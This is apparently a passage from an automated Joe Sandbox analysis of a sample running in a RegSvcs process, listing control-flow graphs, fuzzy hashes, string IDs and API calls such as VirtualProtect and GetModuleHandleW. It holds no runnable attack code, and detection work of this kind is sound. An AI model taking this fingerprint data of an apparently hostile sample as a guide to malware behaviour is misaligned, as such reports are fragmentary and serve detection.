                                                                • Instruction ID: f7e2d0a3cdf2112e711f7d0530e470e7382018fdb819baf82e88e70fe1c1c954
                                                                • Opcode Fuzzy Hash: dd8f5dff6a7f520f3e9e333588269fc44e7b99c4f2711bfeed769d40f1a88900
                                                                • Instruction Fuzzy Hash: 1B71D330B002149FCF699E78A85967E3BA7FF84360F248629EA169B3D0CF358C45C795

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 442 50f5d61-50f5da7 call 50f5218 call 50f6090 448 50f5dad-50f5daf 442->448 449 50f5f83-50f5f8e 442->449 450 50f5f95-50f5fa0 448->450 451 50f5db5-50f5db9 448->451 449->450 457 50f5fa7-50f5fb2 450->457 451->450 452 50f5dbf-50f5df7 call 50f3a80 451->452 452->457 465 50f5dfd-50f5e01 452->465 461 50f5fb9-50f5fc4 457->461 466 50f5fcb-50f5ff7 461->466 467 50f5e0d-50f5e11 465->467 468 50f5e03-50f5e07 465->468 502 50f5ffe-50f602a 466->502 469 50f5e1c-50f5e20 467->469 470 50f5e13-50f5e1a 467->470 468->461 468->467 472 50f5e38-50f5e3c 469->472 473 50f5e22-50f5e26 469->473 470->472 474 50f5e3e-50f5e40 472->474 475 50f5e43-50f5e4a 472->475 477 50f5e28-50f5e2f 473->477 478 50f5e31 473->478 474->475 479 50f5e4c 475->479 480 50f5e53-50f5e57 475->480 477->472 478->472 483 50f5e8f-50f5e93 479->483 484 50f5f08-50f5f0b 479->484 485 50f5ea6-50f5ea9 479->485 486 50f5ed5-50f5ed8 479->486 487 50f5f71-50f5f7c 479->487 481 50f5e5d-50f5e61 480->481 482 50f5f36-50f5f39 480->482 481->487 491 50f5e67-50f5e6a 481->491 489 50f5f3b-50f5f3e 482->489 490 50f5f49-50f5f6c 482->490 526 50f5e96 call 50f6398 483->526 527 50f5e96 call 50f62e8 483->527 528 50f5e96 call 50f62f8 483->528 494 50f5f0d 484->494 495 50f5f12-50f5f31 484->495 496 50f5eab-50f5eae 485->496 497 50f5eb4-50f5ed3 485->497 492 50f5eda-50f5edd 486->492 493 50f5ee3-50f5f06 486->493 487->449 489->490 498 50f5f40-50f5f43 489->498 490->483 490->487 499 50f5e6c 491->499 500 50f5e71-50f5e8d 491->500 492->493 492->502 493->483 494->495 495->483 496->466 496->497 497->483 498->490 507 50f6031-50f606d 498->507 499->500 500->483 502->507 503 50f5e9c-50f5ea3 526->503 527->503 528->503
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $Hbq$Hbq$Hbq
                                                                • API String ID: 0-580995494
                                                                • Opcode ID: be87290bd306030ece6399ea80440bc638cb9be10cc7e1555f1cc6aa8ab0337a
                                                                • Instruction ID: 48ce33cdd8bb3ff9cd531a8a90f02ea36f33074a45d3c592d1b6afb371e2f0a9
                                                                • Opcode Fuzzy Hash: be87290bd306030ece6399ea80440bc638cb9be10cc7e1555f1cc6aa8ab0337a
                                                                • Instruction Fuzzy Hash: 7351C230B002149FCB68AF78A81967E3BA7EF84360F244529EA16DB3D0DF358D45CB95

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1588 50f3420-50f3459 1590 50f345b 1588->1590 1591 50f3460-50f34d9 call 50f2a00 1588->1591 1590->1591 1597 50f34df-50f3518 1591->1597 1600 50f3566-50f357d 1597->1600 1602 50f357f-50f35a4 1600->1602 1603 50f351a-50f352a 1600->1603 1609 50f35bc 1602->1609 1610 50f35a6-50f35bb 1602->1610 1607 50f352c-50f3535 1603->1607 1608 50f354b 1603->1608 1611 50f353c-50f353f 1607->1611 1612 50f3537-50f353a 1607->1612 1613 50f354e-50f3565 1608->1613 1610->1609 1614 50f3549 1611->1614 1612->1614 1613->1600 1614->1613
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q$PH^q
                                                                • API String ID: 0-1598597984
                                                                • Opcode ID: 35e0053c00c679e1992eb81110122fd4111154600e9eaac9bcc677e554c140a9
                                                                • Instruction ID: 5752090facda91147c52e990f09eedd0405dcd6e88762ee4baf40c4c6e95681e
                                                                • Opcode Fuzzy Hash: 35e0053c00c679e1992eb81110122fd4111154600e9eaac9bcc677e554c140a9
                                                                • Instruction Fuzzy Hash: 9151B474E00208DFDB48DFA9E594AEDBBF2BF89311F109429E915AB364DB309946CF10

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1618 50f2519-50f2539 1620 50f253b-50f253d 1618->1620 1621 50f254a-50f2552 1618->1621 1622 50f253f-50f2541 1620->1622 1623 50f2543-50f2548 1620->1623 1624 50f2554-50f2562 1621->1624 1622->1624 1623->1624 1627 50f2578-50f2580 1624->1627 1628 50f2564-50f2566 1624->1628 1631 50f2583-50f2586 1627->1631 1629 50f256f-50f2576 1628->1629 1630 50f2568-50f256d 1628->1630 1629->1631 1630->1631 1633 50f259d-50f25a1 1631->1633 1634 50f2588-50f2596 1631->1634 1635 50f25ba-50f25bd 1633->1635 1636 50f25a3-50f25b1 1633->1636 1634->1633 1640 50f2598 1634->1640 1638 50f25bf-50f25c3 1635->1638 1639 50f25c5-50f25fa 1635->1639 1636->1635 1646 50f25b3 1636->1646 1638->1639 1642 50f25fc-50f2613 1638->1642 1647 50f265c-50f2661 1639->1647 1640->1633 1644 50f2619-50f2625 1642->1644 1645 50f2615-50f2617 1642->1645 1648 50f262f-50f2639 1644->1648 1649 50f2627-50f262d 1644->1649 1645->1647 1646->1635 1651 50f2641 1648->1651 1652 50f263b 1648->1652 1649->1651 1653 50f2649-50f2655 1651->1653 1652->1651 1653->1647
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xbq$Xbq
                                                                • API String ID: 0-1243427068
                                                                • Opcode ID: 43a397dc7e5685c65bf860dbd2c0c03cefd38d3144c54b31c6433847f411884e
                                                                • Instruction ID: b0916c00be079fce1e5a205937483026e06b2e03b581d113081087e9032bca60
                                                                • Opcode Fuzzy Hash: 43a397dc7e5685c65bf860dbd2c0c03cefd38d3144c54b31c6433847f411884e
                                                                • Instruction Fuzzy Hash: F7315939B0422687CF589A79ADA837EA6DBBBC4710F184439DA03D3790DF74CC458791

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1657 50f6661-50f66ce 1664 50f66dd-50f66f9 1657->1664 1667 50f66fb-50f66fe 1664->1667 1668 50f6700-50f675a call 50f3a90 1664->1668 1667->1668 1669 50f6762-50f676b 1667->1669 1668->1669 1670 50f676d-50f6770 1669->1670 1671 50f6772-50f67a8 1669->1671 1670->1671 1673 50f67d7-50f67dd 1670->1673 1671->1673 1683 50f67aa-50f67cf call 50f3aa0 1671->1683 1683->1673
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8cq$TJcq
                                                                • API String ID: 0-1920894394
                                                                • Opcode ID: 89633e873bcc82817683719c5372b96c6be00c6664437c43a735e11f3119baa3
                                                                • Instruction ID: 5beabfc9e2db91e49ce1fca6777cb10680bb154196a2af19b798749792c90dcd
                                                                • Opcode Fuzzy Hash: 89633e873bcc82817683719c5372b96c6be00c6664437c43a735e11f3119baa3
                                                                • Instruction Fuzzy Hash: 44310335B402098FCB45DFA8D584E9DBBF2FF88320F195594E605AB365CA31EC85CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1688 50f6695-50f66ce 1695 50f66dd-50f66f9 1688->1695 1698 50f66fb-50f66fe 1695->1698 1699 50f6700-50f675a call 50f3a90 1695->1699 1698->1699 1700 50f6762-50f676b 1698->1700 1699->1700 1701 50f676d-50f6770 1700->1701 1702 50f6772-50f67a8 1700->1702 1701->1702 1704 50f67d7-50f67dd 1701->1704 1702->1704 1714 50f67aa-50f67cf call 50f3aa0 1702->1714 1714->1704
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8cq$TJcq
                                                                • API String ID: 0-1920894394
                                                                • Opcode ID: 9ce96d3e83e0198ef2e531aa476a67684df35406c834a62a37799f2478667020
                                                                • Instruction ID: 9170e5705526d3864668f9cd4f95d6aee580e203876b9a976dad10ed3963c7cc
                                                                • Opcode Fuzzy Hash: 9ce96d3e83e0198ef2e531aa476a67684df35406c834a62a37799f2478667020
                                                                • Instruction Fuzzy Hash: 93310635B402198FCB45DFA8C584E9DBBF2EF88320F155594E605AB365CA71EC85CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1719 64d2608-64d2617 1720 64d2619-64d2626 call 64d15d0 1719->1720 1721 64d2643-64d2647 1719->1721 1726 64d263c 1720->1726 1727 64d2628 1720->1727 1722 64d2649-64d2653 1721->1722 1723 64d265b-64d269c 1721->1723 1722->1723 1730 64d269e-64d26a6 1723->1730 1731 64d26a9-64d26b7 1723->1731 1726->1721 1775 64d262e call 64d28d8 1727->1775 1776 64d262e call 64d28e8 1727->1776 1730->1731 1733 64d26b9-64d26be 1731->1733 1734 64d26db-64d26dd 1731->1734 1732 64d2634-64d2636 1732->1726 1735 64d2778-64d2849 1732->1735 1737 64d26c9 1733->1737 1738 64d26c0-64d26c7 call 64d15dc 1733->1738 1736 64d26e0-64d26e7 1734->1736 1769 64d285d-64d289a GetModuleHandleW 1735->1769 1770 64d284b-64d285a 1735->1770 1741 64d26e9-64d26f1 1736->1741 1742 64d26f4-64d26fb 1736->1742 1740 64d26cb-64d26d9 1737->1740 1738->1740 1740->1736 1741->1742 1744 64d26fd-64d2705 1742->1744 1745 64d2708 1742->1745 1744->1745 1747 64d270f-64d2711 1745->1747 1749 64d271e-64d2723 1747->1749 1750 64d2713-64d271b 1747->1750 1751 64d2725-64d272c 1749->1751 1752 64d2741-64d274e 1749->1752 1750->1749 1751->1752 1754 64d272e-64d273e call 64d144c call 64d15ec 1751->1754 1759 64d2771-64d2777 1752->1759 1760 64d2750-64d276e 1752->1760 1754->1752 1760->1759 1771 64d289c-64d28a2 1769->1771 1772 64d28a3-64d28d1 1769->1772 1770->1769 1771->1772 1775->1732 1776->1732
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 1fd54f42156bcfb25458f05484d2d42cf3498f87b3bc1061c1b25175d368004c
                                                                • Instruction ID: fcb1a3c7586acbb281b9d0ac9064c16f473b282216167b0c10ce112041159241
                                                                • Opcode Fuzzy Hash: 1fd54f42156bcfb25458f05484d2d42cf3498f87b3bc1061c1b25175d368004c
                                                                • Instruction Fuzzy Hash: 9B913170E00B099FDB64DF6AD490A9ABBF1BF48300F10892AE546A7750DB70E945CF94

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1777 64d4d46-64d4de6 1780 64d4dfd-64d4e08 1777->1780 1781 64d4de8-64d4dfa 1777->1781 1782 64d4e1c-64d4e7c 1780->1782 1783 64d4e0a-64d4e19 1780->1783 1781->1780 1785 64d4e84-64d4f24 CreateWindowExW 1782->1785 1783->1782 1786 64d4f2d-64d4f98 1785->1786 1787 64d4f26-64d4f2c 1785->1787 1791 64d4f9a-64d4f9d 1786->1791 1792 64d4fa5 1786->1792 1787->1786 1791->1792 1793 64d4fa6 1792->1793 1793->1793
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 064D4F11
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 1d54ce311f4aa125a15abc50b47ca501901b24172394203bf428496d7aae2fbd
                                                                • Instruction ID: 9963f3f6c37a62e3cdd32a2c2967dd297876a074b8a3c3d6e23c931c5a7b5b76
                                                                • Opcode Fuzzy Hash: 1d54ce311f4aa125a15abc50b47ca501901b24172394203bf428496d7aae2fbd
                                                                • Instruction Fuzzy Hash: D6718BB4D00258DFDF60CFA9C984ADEBBF1BF09314F1491AAE858A7221D730A985CF45

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1794 64d2a94-64d4de6 1796 64d4dfd-64d4e08 1794->1796 1797 64d4de8-64d4dfa 1794->1797 1798 64d4e1c-64d4f24 CreateWindowExW 1796->1798 1799 64d4e0a-64d4e19 1796->1799 1797->1796 1802 64d4f2d-64d4f98 1798->1802 1803 64d4f26-64d4f2c 1798->1803 1799->1798 1807 64d4f9a-64d4f9d 1802->1807 1808 64d4fa5 1802->1808 1803->1802 1807->1808 1809 64d4fa6 1808->1809 1809->1809
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 064D4F11
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 19a679822fed597e07e345873bfb00c5c57d5a6fc5fd35391fc1cf9857031ab5
                                                                • Instruction ID: 596d121c51a8bd703fc6a3d1d7d5a142b20c5a19a54314d189cf47f9edeaa06f
                                                                • Opcode Fuzzy Hash: 19a679822fed597e07e345873bfb00c5c57d5a6fc5fd35391fc1cf9857031ab5
                                                                • Instruction Fuzzy Hash: 09718BB4D00258DFDF60CFA9D984ADEBBF1BB09304F1491AAE818A7221D730A985CF45
                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 064D7581
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: 664acf8d999b5004ab2d8936c9d015e3ea3eb9ba6c282c858ba44286326397ef
                                                                • Instruction ID: f04407d377beb9174985027b665ca5c2bc152aed73d5cb61516eb1715600a5ce
                                                                • Opcode Fuzzy Hash: 664acf8d999b5004ab2d8936c9d015e3ea3eb9ba6c282c858ba44286326397ef
                                                                • Instruction Fuzzy Hash: 074128B5900309CFDB54CF99C458AAAFBF5FB88314F24C45AE519AB321D734A841CFA5
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0293F4FC
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: d587b4ab5426e297e12cb18c07f0d6590f0c4d0c3177ac206c41e1696d9910fc
                                                                • Instruction ID: a424e31caa0c7e5733ec957e2288f9f65b32a8e3b881773998751a471d33e0a6
                                                                • Opcode Fuzzy Hash: d587b4ab5426e297e12cb18c07f0d6590f0c4d0c3177ac206c41e1696d9910fc
                                                                • Instruction Fuzzy Hash: 8131A7B9D002589FCF10CFA9D984AEEFBF4BB49310F20942AE818B7210D735A945CF58
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(?), ref: 064D288A
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: a63e1e344e51a68d6b367b58c66b7666d783259c8b497ff1aeccf90e98f71b15
                                                                • Instruction ID: 4a07a09d6657953094d48c173b8f15b1a542d870e8f5884bf72c2aec55b8ce62
                                                                • Opcode Fuzzy Hash: a63e1e344e51a68d6b367b58c66b7666d783259c8b497ff1aeccf90e98f71b15
                                                                • Instruction Fuzzy Hash: E331CAB4D00219DFCB14CFAAD484ADEFBF4AB49310F14906AE918B7320D374AA41CFA4
                                                                APIs
                                                                  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                • SysAllocString.OLEAUT32 ref: 00401898
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocString_malloc
                                                                • String ID:
                                                                • API String ID: 959018026-0
                                                                • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                APIs
                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateHeap
                                                                • String ID:
                                                                • API String ID: 10892065-0
                                                                • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q
                                                                • API String ID: 0-2625958711
                                                                • Opcode ID: 34a2d8bc86964afe9ef0d7f70edf7b71c1bb06ad9669c16cde859870c66fee0d
                                                                • Instruction ID: 49d8770de458564f110f1d88a116eadfbe7df264bd730f7c64b9fc13a26acb90
                                                                • Opcode Fuzzy Hash: 34a2d8bc86964afe9ef0d7f70edf7b71c1bb06ad9669c16cde859870c66fee0d
                                                                • Instruction Fuzzy Hash: E2A1C774A40349CFCB05EFA8E984A9EBBB2FF45305B104A65D405EB369DB306D89CF90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q
                                                                • API String ID: 0-2625958711
                                                                • Opcode ID: dfa587d31a1ab94e1e812001f5e7b29246841aaa401c1f0618affdc265799964
                                                                • Instruction ID: 0fed912ca70c5bf3a193dbd92e465659570222e5a06c4612e1220fe2bcf9ddca
                                                                • Opcode Fuzzy Hash: dfa587d31a1ab94e1e812001f5e7b29246841aaa401c1f0618affdc265799964
                                                                • Instruction Fuzzy Hash: 38A19774E40209CFCB05EFA8E984A9EBBB2FF49305B105A25D415AB369DB706D85CF90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hbq
                                                                • API String ID: 0-1245868
                                                                • Opcode ID: 7cb06202673ac1b68abee8409ef1441fbb9a6cdcb0bfc115ce5519dfdbe00fa1
                                                                • Instruction ID: 96a122bd626598dffbd551269501484d8c02ba8cccc34c49af009d1cdbcab12d
                                                                • Opcode Fuzzy Hash: 7cb06202673ac1b68abee8409ef1441fbb9a6cdcb0bfc115ce5519dfdbe00fa1
                                                                • Instruction Fuzzy Hash: 2541C431B042089FCB48AF78D8596AE7FF6EF85300F2484BAE605D7791DE358D058760
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hbq
                                                                • API String ID: 0-1245868
                                                                • Opcode ID: e5c616e78faa73f90a3d3ba90a69b01ee56d07855e898b0ac2629c3718ba8741
                                                                • Instruction ID: 63c148421442830acab0761e2f138f0116efe483f1af129453dd25b26d3c5703
                                                                • Opcode Fuzzy Hash: e5c616e78faa73f90a3d3ba90a69b01ee56d07855e898b0ac2629c3718ba8741
                                                                • Instruction Fuzzy Hash: 3421E4317042489FC708EB68D955AAE7BAAFF85300F24806AE945DB791DE358D06C791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: afe54d4604a33d9da433127b953c334a0a2e62fab2322785dc40df681ec2c5a6
                                                                • Instruction ID: dbdaa5a0cca095d4e7708577e25b2ff113032f04b442495aca4d17f0c9337157
                                                                • Opcode Fuzzy Hash: afe54d4604a33d9da433127b953c334a0a2e62fab2322785dc40df681ec2c5a6
                                                                • Instruction Fuzzy Hash: 1721A130B001049FCB44EBB9E999B9EBBE2FF84304F1486A9D10CDB765DB759E498B41
                                                                APIs
                                                                • CloseHandle.KERNELBASE(?), ref: 0293F7A6
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: b2c548668983cc82acbf20cd2464c566c1a96c35321ccf0b5b95d5cd90bceeb3
                                                                • Instruction ID: a856539154e5fba43b9a4d3e298cd744229222ae7835146b77b848fe372b71b7
                                                                • Opcode Fuzzy Hash: b2c548668983cc82acbf20cd2464c566c1a96c35321ccf0b5b95d5cd90bceeb3
                                                                • Instruction Fuzzy Hash: AB31AAB5D012189FCB14CFAAD984ADEFBF4AB49310F14942AE815B7310C734A941CF98
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7c446c75dcf434adf31f97d99f3fcec184117519c7ee8b8cdcef45adca9031a
                                                                • Instruction ID: 1199cf83ac616c804147c62be886ea76ff93c471f1b6f6623b8cfbf2ba92fce5
                                                                • Opcode Fuzzy Hash: e7c446c75dcf434adf31f97d99f3fcec184117519c7ee8b8cdcef45adca9031a
                                                                • Instruction Fuzzy Hash: DFF0F8308B57038FD3612B24AAAD36A7B64EB0B313B066F10A10A91051DF74412CCA75
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a747d2f9626bea457c82185a9e3b1e28edb0805b57a273539dde7be66553cd3e
                                                                • Instruction ID: 3e8225f2579a06187ee242b5dda01463558d19a6e22e42e848df64bceeafd19d
                                                                • Opcode Fuzzy Hash: a747d2f9626bea457c82185a9e3b1e28edb0805b57a273539dde7be66553cd3e
                                                                • Instruction Fuzzy Hash: 0341D5777046069FC7549EADEC44A6FBBEAFBC8324B14852EE625C7B50D632D8018750
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46c53d97601eff92660a866acbe160ee8c3c9510748ceee2d619c41b2943850e
                                                                • Instruction ID: 858c35f18bbd39f74b54d4287fe9a2c59e161713a849379d5781061f410d167c
                                                                • Opcode Fuzzy Hash: 46c53d97601eff92660a866acbe160ee8c3c9510748ceee2d619c41b2943850e
                                                                • Instruction Fuzzy Hash: F8418174E01209CFCB08DFAAE994A9DBBF2BF89310F109429E905B7364DB359945CF54
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc8841e37a4630db23660c02f3b12a5744c3d444b61c11a8e560ac14ddd304ad
                                                                • Instruction ID: a5754ee37278292b4f579ffe8a016edf865fcbd4e4bc9b046efdd7045a3e2eac
                                                                • Opcode Fuzzy Hash: cc8841e37a4630db23660c02f3b12a5744c3d444b61c11a8e560ac14ddd304ad
                                                                • Instruction Fuzzy Hash: 6F31C1748B524A9FC2352F24A2AC66ABB75FF1FB137126E19E44AD18259F71006DCA10
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef60e14e83a7a2f80ee4b4a593447a9f3b614e16a1efb2a15e5b2f2953f84e37
